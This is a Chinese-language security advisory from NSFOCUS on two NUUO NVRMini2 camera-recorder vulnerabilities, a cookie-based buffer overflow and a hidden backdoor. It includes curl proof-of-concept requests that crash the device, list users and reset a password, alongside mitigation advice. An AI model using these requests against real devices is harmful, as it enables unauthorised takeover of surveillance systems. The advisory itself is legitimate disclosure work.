• ?

    安全研究

    威脅通告
    NUUO攝像頭系統NVRMini2多個漏洞 威脅預警通告

    綜述

       北京時間2018年9月18日,Tenable官網上公開了關于由NUUO公司開發的攝像頭系統NVRMini2存在多個嚴重漏洞,風險信息如下:

    項目

    描述

    CVE ID

    CVE-2018-1149 CVE-2018-1150

    Nessus插件ID

    117427

    CVSSv2基準/時間分數

    10.0 / 8.3

    CVSSv2向量

    AV:N / AC:L / Au:N / C:C / I:C / A:C

    受影響的產品

    NUUO NVRMini2 3.8.0及以下版本

    風險因素

    嚴重


    https://www.tenable.com/security/research/tra-2018-25

    攻擊演示視頻如下:

    http://www.iqiyi.com/w_19s2b6hn11.html

    NVRMini2的結構簡圖如下

    漏洞概述

    CVE-2018-1149:未經身份驗證的遠程堆棧緩沖區溢出

        NVRMini2系統對外暴露了一個HTTP訪問接口http:///cgi-bin/cgi_system,通過這個接口,具有權限的用戶可以訪問到終端設備。cgi_system文件中的功能只有授權用戶可以訪問,認證的方法為比較用戶訪問數據Cookie字段中的PHPSESSID值和存儲/tmp目錄中的session文件名,構建session文件名的代碼如下:


       

    從sub_534a4返回的值為會話標識字符串。程序對該字符串長度沒有作任何限制。當字符串傳遞到sprintf以構建tmp文件名時并沒有邊界檢查。因此,未經身份驗證的攻擊者可以將超長的PHPSESSID值遠程傳遞給sprintf導致緩沖區溢出,從而遠程執行代碼。

       測試代碼如下:

    curl -v --cookie "PHPSESSID=982e6c010064b3878a4b793bfab8d2d2aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;" "http://XXXXXXXXXXXX/cgi-bin/cgi_system?cmd=portCheck"

       測試代碼會導致NVR系統會發生崩潰現象,經過深入分析,也可以遠程執行代碼,攻擊者不僅能夠控制NVR,還可以訪問和修改NVR中所有的用戶憑證數據,影響嚴重。


    CVE-2018-1150:后門

    NVRMini2的PHP代碼中常見的習慣為:

    1.  檢查當前PHP會話是否有效。

    2.  驗證會話是否具有正在訪問的頁面的適當權限(即admin,poweruser,user,root,guest)。

    但是,check_session_is_valid()函數中卻存在后門的代碼,函數如下:

    if (file_exists(constant("MOSES_FILE"))) //back door
     {
         update_session();
         return 0;
     }

    其中標識為“back door”的字樣為其源碼中就存在的。constant("MOSES_FILE")指向的路徑為/tmp/moses。如果/tmp/moses/存在,則未授權的攻擊者可以遠程列出所有非admin的用戶,并修改他們的密碼.

    [email protected]:~$ curl http://xxxxxxxxxxx/users_xml.php
    <AccountInfo>
    <users>
    <userinfo><no>1</no><username>testuser</username><group>poweruser</group><displaygroup>power user</displaygroup><live>12345678</live><playback>12345678</playback><ptz>1</ptz><io>1</io><backupdata>1</backupdata><deletedata>1</deletedata><emapsetting>1</emapsetting><remotalksetting>1
    </remotalksetting><log>0</log></userinfo>
    </users>
    <groups>
    <groupinfo><no>1</no><groupname>poweruser</groupname><displayname>power user</displayname><groupmembers>testuser</groupmembers></groupinfo><groupinfo><no>2</no><groupname>user</groupname><displayname>user</displayname><groupmembers></groupmembers></groupinfo><groupinfo><no>3</no><groupname>guestuser</groupname><displayname>guestuser</displayname><groupmembers></groupmembers></groupinfo></groups>
    </AccountInfo>

    [email protected]:~$ curl 'http://xxxxxxxxx /users_xml.php?cmd=changepwd&username=testuser&newpwd=pwned'
    change password: testuser ok!



    解決方案

    官方方案

       官方暫時沒有相關的方案,建議保證設備不暴露在互聯網上,并在防火墻設備上加入對攝像頭HTTP服務的訪問控制策略。

    綠盟科技方案

    檢測方案

    1. 使用綠盟科技Web應用漏洞掃描系統、綠盟科技綠盟遠程安全評估系統發現內網存在問題的設備。

    2. 使用綠盟科技網絡入侵檢測系統發現網絡中存在的攻擊特征。

    防護方案

       使用綠盟科技WEB應用防護系統、綠盟科技NF防火墻系統、綠盟科技網絡入侵防護系統進行設備隔離或者攻擊阻斷。


    聲 明

    本安全公告僅用來描述可能存在的安全問題,綠盟科技不為此安全公告提供任何保證或承諾。由于傳播、利用此安全公告所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,綠盟科技以及安全公告作者不為此承擔任何責任。綠盟科技擁有對此安全公告的修改和解釋權。如欲轉載或傳播此安全公告,必須保證此安全公告的完整性,包括版權聲明等全部內容。未經綠盟科技允許,不得任意修改或者增減此安全公告內容,不得以任何方式將其用于商業目的。


    關于綠盟科技

    北京神州綠盟信息安全科技股份有限公司(簡稱綠盟科技)成立于2000年4月,總部位于北京。在國內外設有30多個分支機構,為政府、運營商、金融、能源、互聯網以及教育、醫療等行業用戶,提供具有核心競爭力的安全產品及解決方案,幫助客戶實現業務的安全順暢運行。

    基于多年的安全攻防研究,綠盟科技在網絡及終端安全、互聯網基礎安全、合規及安全管理等領域,為客戶提供入侵檢測/防護、抗拒絕服務攻擊、遠程安全評估以及Web安全防護等產品以及專業安全服務。

    北京神州綠盟信息安全科技股份有限公司于2014年1月29日起在深圳證券交易所創業板上市交易,股票簡稱:綠盟科技,股票代碼:300369。

         



    瀏覽次數:

    關 閉
    破解11选5的密码出号